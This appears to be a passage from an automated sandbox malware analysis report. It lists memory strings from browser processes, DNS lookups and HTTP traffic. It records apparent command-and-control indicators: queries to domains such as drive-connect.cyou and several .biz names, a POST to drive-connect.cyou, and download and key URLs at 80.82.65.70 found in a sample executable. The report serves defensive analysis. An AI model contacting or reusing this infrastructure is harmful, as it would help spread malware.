data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"YouTube"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 0000002C.00000002.2966884733.0000020DC648A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002C.00000002.2966884733.0000020DC648A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002C.00000002.2966884733.0000020DC648A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002C.00000002.2966884733.0000020DC648A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002C.00000002.2966884733.0000020DC648A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000002C.00000002.2966884733.0000020DC648A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002C.00000002.2966884733.0000020DC648A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002C.00000002.2966884733.0000020DC648A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002C.00000002.2966884733.0000020DC648A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002C.00000002.2966884733.0000020DC648A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002C.00000002.2966884733.0000020DC648A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002C.00000002.2966884733.0000020DC648A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000002C.00000002.2966884733.0000020DC648A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002C.00000002.2966884733.0000020DC648A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002C.00000002.2966884733.0000020DC648A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000002C.00000002.2966884733.0000020DC648A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002C.00000002.2966884733.0000020DC648A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002C.00000002.2966884733.0000020DC648A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
Source: firefox.exe, 0000002C.00000002.2966884733.0000020DC648A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002C.00000002.2782557200.0000020DC0458000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2966884733.0000020DC648A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002C.00000002.2782557200.0000020DC0458000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2966884733.0000020DC648A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000002C.00000002.2782557200.0000020DC0458000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2966884733.0000020DC648A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002C.00000002.3041016622.0000320652A00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/Z equals www.youtube.com (Youtube)
Source: chrome.exe, 00000019.00000002.2742340293.00006AE4002C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002C.00000002.2785004259.0000020DC0503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: media.gmp-manager.checkContentSignaturemedia.{0}.allow-x64-plugin-on-arm64resource://gre/modules/AddonManager.sys.mjsmedia.gmp-manager.secondsBetweenChecksonPrefEnabledChanged() - adding gmp directory resource://gre/modules/UpdateUtils.sys.mjsmedia.gmp-manager.cert.requireBuiltInpictureinpicture%40mozilla.org:1.0.0https://smartblock.firefox.etp/facebook.svg://www.everestjs.net/static/st.v3.js://pub.doubleverify.com/signals/pub.js://auth.9c9media.ca/auth/main.js://www.rva311.com/static/js/main..chunk.jsFileUtils_openSafeFileOutputStream://static.criteo.net/js/ld/publishertag.js://c.amazon-adsystem.com/aax2/apstag.js@mozilla.org/addons/addon-manager-startup;1://cdn.branch.io/branch-latest.min.js*://web-assets.toggl.com/app/assets/scripts/.js://libs.coremetrics.com/eluminate.js://connect.facebook.net//sdk.js@mozilla.org/network/file-output-stream;1://connect.facebook.net//all.jsresource://gre/modules/addons/XPIProvider.jsmwebcompat-reporter@mozilla.org.xpi://static.chartbeat.com/js/chartbeat_video.js://track.adform.net/serving/scripts/trackpoint/@mozilla.org/network/atomic-file-output-stream;1webcompat-reporter%40mozilla.org:1.5.1FileUtils_closeSafeFileOutputStreamFileUtils_openAtomicFileOutputStreamFileUtils_closeAtomicFileOutputStream://static.chartbeat.com/js/chartbeat.js://.imgur.com/js/vendor..bundle.js://.imgur.io/js/vendor..bundle.jshttps://smartblock.firefox.etp/play.svgresource://gre/modules/FileUtils.sys.mjsresource://gre/modules/ConduitsParent.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002C.00000002.2938854910.0000020DC51F4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.3041016622.0000320652A00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2938854910.0000020DC5124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002C.00000002.3041016622.0000320652A00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002C.00000002.2933729031.0000020DC4F85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2938854910.0000020DC5124000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2938854910.0000020DC515B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: x://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002C.00000002.2785004259.0000020DC0579000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}Got invalid request to save JSON data@mozilla.org/uriloader/handler-service;1devtools.debugger.remote-websocket@mozilla.org/network/protocol;1?name=defaultresource://devtools/shared/security/socket.jsresource://devtools/server/devtools-server.jsJSON Viewer's onSave failed in startPersistencedevtools.performance.recording.ui-base-url@mozilla.org/network/protocol;1?name=file@mozilla.org/dom/slow-script-debug;1Failed to listen. Callback argument missing.WebChannel/this._originCheckCallbackbrowser.fixup.dns_first_for_single_wordsdevtools/client/framework/devtoolsreleaseDistinctSystemPrincipalLoaderDevTools telemetry entry point failed: Failed to listen. Listener already attached.browser.urlbar.dnsResolveFullyQualifiedNames^([a-z+.-]+:\/{0,3})([^\/@]+@).+devtools.performance.popup.feature-flag^[a-z0-9-]+(\.[a-z0-9-]+):[0-9]{1,5}([/?#]\|$)^([a-z][a-z0-9.+\t-]*)(:\|;)?(\/\/)?^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$No callback set for this channel.devtools/client/framework/devtools-browserFailed to execute WebChannel callback:Unable to start devtools server on browser.fixup.domainsuffixwhitelist.get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPget FIXUP_FLAGS_MAKE_ALTERNATE_URIDevToolsStartup.jsm:handleDebuggerFlag@mozilla.org/network/file-input-stream;1resource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/JSONFile.sys.mjsresource://gre/modules/FileUtils.sys.mjshttps://e.mail.ru/cgi-bin/sentmsg?mailto=%s{c6cf88b7-452e-47eb-bdc9-86e3561648ef}handlerSvc fillHandlerInfo: don't know this typeresource://gre/modules/DeferredTask.sys.mjs_injectDefaultProtocolHandlersIfNeeded_finalizeInternal/this._finalizePromise<gecko.handlerService.defaultHandlersVersionhttp://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/ExtHandlerService.sys.mjsresource://gre/modules/URIFixup.sys.mjsScheme should be either http or httpshttps://poczta.interia.pl/mh/?mailto=%sisDownloadsImprovementsAlreadyMigratedhttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.yahoo.co.jp/compose/?To=%shttp://www.inbox.lv/rfc2368/?value=%s@mozilla.org/uriloader/web-handler-app;1extractScheme/fixupChangedProtocol<resource://gre/modules/JSONFile.sys.mjshttps://mail.inbox.lv/compose?to=%s{33d75835-722f-42c0-89cc-44f328e56a86}Can't invoke URIFixup in the content process@mozilla.org/uriloader/local-handler-app;1resource://gre/modules/FileUtils.sys.mjshttp://compose.mail.yahoo.co.jp/ym/Compose?To=%s@mozilla.org/uriloader/dbus-handler-app;1get FIXUP_FLAG_FORCE_ALTERNATE_URIresource://gre/modules/NetUtil.sys.mjsMust have a source and a callback@mozilla.org/network/input-stream-pump;1@mozilla.org/network/async-stream-copier;1newChannel requires a single object argumentFirst argument should be an nsIInputStreamNon-zero amount of bytes must be specified@mozilla.org/scriptableinputstream;1https://mail.yandex.ru/compose?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%s@mozilla.org/intl/converter-input-stream;1@mozilla.org/network/simple-stream-listener;1https://m

Source: global traffic	DNS traffic detected: DNS query: drive-connect.cyou
Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: zonedw.sbs
Source: global traffic	DNS traffic detected: DNS query: se-blurry.biz
Source: global traffic	DNS traffic detected: DNS query: zinc-sneark.biz
Source: global traffic	DNS traffic detected: DNS query: dwell-exclaim.biz
Source: global traffic	DNS traffic detected: DNS query: formy-spill.biz
Source: global traffic	DNS traffic detected: DNS query: covery-mover.biz
Source: global traffic	DNS traffic detected: DNS query: dare-curbys.biz
Source: global traffic	DNS traffic detected: DNS query: print-vexer.biz
Source: global traffic	DNS traffic detected: DNS query: impend-differ.biz
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic	DNS traffic detected: DNS query: youtube.com
Source: global traffic	DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: fightlsoser.click
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drive-connect.cyou

Source: a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: 8f25543307.exe, 00000014.00000002.3200765097.00000000055B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp
Source: 8f25543307.exe, 00000014.00000002.3185511636.0000000000D89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.82.65.70/dll/download
Source: 8f25543307.exe, 00000014.00000002.3185511636.0000000000D76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.82.65.70/dll/key
Source: 8f25543307.exe, 00000014.00000002.3185511636.0000000000D76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.82.65.70/dll/key2
Source: 8f25543307.exe, 00000014.00000003.2400987120.000000000594B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.82.65.70/files/download
Source: 8f25543307.exe, 00000014.00000002.3185511636.0000000000D59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.82.65.70/files/download.
Source: 8f25543307.exe, 00000014.00000002.3185511636.0000000000D59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.82.65.70/files/downloadX
Source: 8f25543307.exe, 00000014.00000002.3185511636.0000000000D59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.82.65.70/soft/download
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744690208.00006AE4004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2162
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744690208.00006AE4004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/30787
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3205
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3206
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3452
Source: chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/34522
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744690208.00006AE4004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3498
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3502
Source: chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3502:
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3577
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3584
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3586
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810217952.00006AE400BA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3623
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810217952.00006AE400BA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3624
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810217952.00006AE400BA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3625
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3832
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3862
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3965
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744690208.00006AE4004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3970
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4324
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4384
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4405
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4428
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4551
